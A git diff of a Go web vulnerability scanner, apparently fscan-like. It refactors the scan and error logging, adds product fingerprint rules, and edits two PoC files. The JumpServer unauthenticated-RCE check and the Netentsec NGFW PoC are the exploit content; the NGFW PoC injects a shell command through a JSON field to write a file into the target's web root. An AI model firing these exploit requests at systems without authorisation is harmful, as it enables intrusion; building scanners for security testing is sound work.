diff --git a/WebScan/WebScan.go b/WebScan/WebScan.go index a7a0f18..a2274fd 100644 --- a/WebScan/WebScan.go +++ b/WebScan/WebScan.go @@ -14,27 +14,28 @@ var Pocs embed.FS func WebScan(info *common.HostInfo) { var pocinfo = common.Pocinfo - buf := strings.Split(info.Url,"/") - pocinfo.Target = strings.Join(buf[:3],"/") - for _,infostr := range info.Infostr { + buf := strings.Split(info.Url, "/") + pocinfo.Target = strings.Join(buf[:3], "/") + if pocinfo.PocName != "" { + Execute(pocinfo) + return + } + for _, infostr := range info.Infostr { pocinfo.PocName = lib.CheckInfoPoc(infostr) - err := Execute(pocinfo) - if err != nil { - errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err) - common.LogError(errlog) - } + Execute(pocinfo) } } -func Execute(PocInfo common.PocInfo) error { +func Execute(PocInfo common.PocInfo) { req, err := http.NewRequest("GET", PocInfo.Target, nil) if err != nil { - return err + errlog := fmt.Sprintf("[-] webtitle %v %v", PocInfo.Target, err) + common.LogError(errlog) + return } req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36") if PocInfo.Cookie != "" { req.Header.Set("Cookie", PocInfo.Cookie) } lib.CheckMultiPoc(req, Pocs, PocInfo.Num, PocInfo.PocName) - return nil } diff --git a/WebScan/info/rules.go b/WebScan/info/rules.go index 83eea01..510e542 100644 --- a/WebScan/info/rules.go +++ b/WebScan/info/rules.go @@ -12,8 +12,8 @@ type Md5Data struct { } type PocData struct { - Name string - Alias string + Name string + Alias string } var RuleDatas = []RuleData{ @@ -120,6 +120,7 @@ var RuleDatas = []RuleData{ {"Jboss", "code", "(Welcome to JBoss|jboss.css)"}, {"Jboss", "headers", "(JBoss)"}, {"泛微E-mobile", "code", "(Weaver E-mobile|weaver,e-mobile)"}, + {"泛微E-Mobile", "headers", "(EMobileServer)"}, {"齐治堡垒机", "code", "(logo-icon-ico72.png|resources/themes/images/logo-login.png)"}, {"ThinkPHP", "headers", "(ThinkPHP)"}, {"ThinkPHP", "code", "(/Public/static/js/)"}, @@ -136,6 +137,11 @@ var RuleDatas = []RuleData{ {"finereport", "code", "(isSupportForgetPwd|FineReport,Web Reporting Tool)"}, {"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization)"}, {"GitLab", "code", "(href=\"https://about.gitlab.com/)"}, + {"用友NC", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg)"}, + {"Jquery-1.7.2", "code", "(/webui/js/jquerylib/jquery-1.7.2.min.js)"}, + {"Hadoop Applications", "code", "(/cluster/app/application)"}, + {"用友IUFO", "code", "(iufo/web/css/menu.css)"}, + {"海昌OA", "code", "(/loginmain4/js/jquery.min.js)"}, } var Md5Datas = []Md5Data{ @@ -162,15 +168,17 @@ var Md5Datas = []Md5Data{ } var PocDatas = []PocData{ - {"致远OA","seeyon"}, - {"泛微OA","weaver-oa"}, - {"通达OA","tongda"}, - {"ThinkPHP","thinkphp"}, - {"Nexus","nexus"}, - {"齐治堡垒机","qizhi"}, - {"weaver-ebridge","weaver-ebridge"}, - {"weblogic","weblogic"}, - {"zabbix","zabbix"}, - {"VMware vSphere","vmware"}, - {"Jboss","jboss"}, -} \ No newline at end of file + {"致远OA", "seeyon"}, + {"泛微OA", "weaver-oa"}, + {"通达OA", "tongda"}, + {"ThinkPHP", "thinkphp"}, + {"Nexus", "nexus"}, + {"齐治堡垒机", "qizhi"}, + {"weaver-ebridge", "weaver-ebridge"}, + {"weblogic", "weblogic"}, + {"zabbix", "zabbix"}, + {"VMware vSphere", "vmware"}, + {"Jboss", "jboss"}, + {"用友NC", "yongyou"}, + {"用友IUFO", "yongyou"}, +} diff --git a/WebScan/pocs/jumpserver-unauth-rce2.yml b/WebScan/pocs/jumpserver-unauth-rce2.yml index 34bb49e..353329d 100644 --- a/WebScan/pocs/jumpserver-unauth-rce2.yml +++ b/WebScan/pocs/jumpserver-unauth-rce2.yml @@ -2,7 +2,7 @@ name: poc-yaml-jumpserver-unauth-rce set: r1: randomLowercase(5) rules: - - method: GET + - method: GET path: /api/v1/users/connection-token/ follow_redirects: false expression: | diff --git a/WebScan/pocs/netentsec-ngfw-rce.yml b/WebScan/pocs/netentsec-ngfw-rce.yml index 51336aa..bff8b28 100644 --- a/WebScan/pocs/netentsec-ngfw-rce.yml +++ b/WebScan/pocs/netentsec-ngfw-rce.yml @@ -7,7 +7,8 @@ set: rules: - method: POST path: /directdata/direct/router - body: {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="} + body: >- + {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="} expression: response.status == 200 - method: GET path: /{{r2}}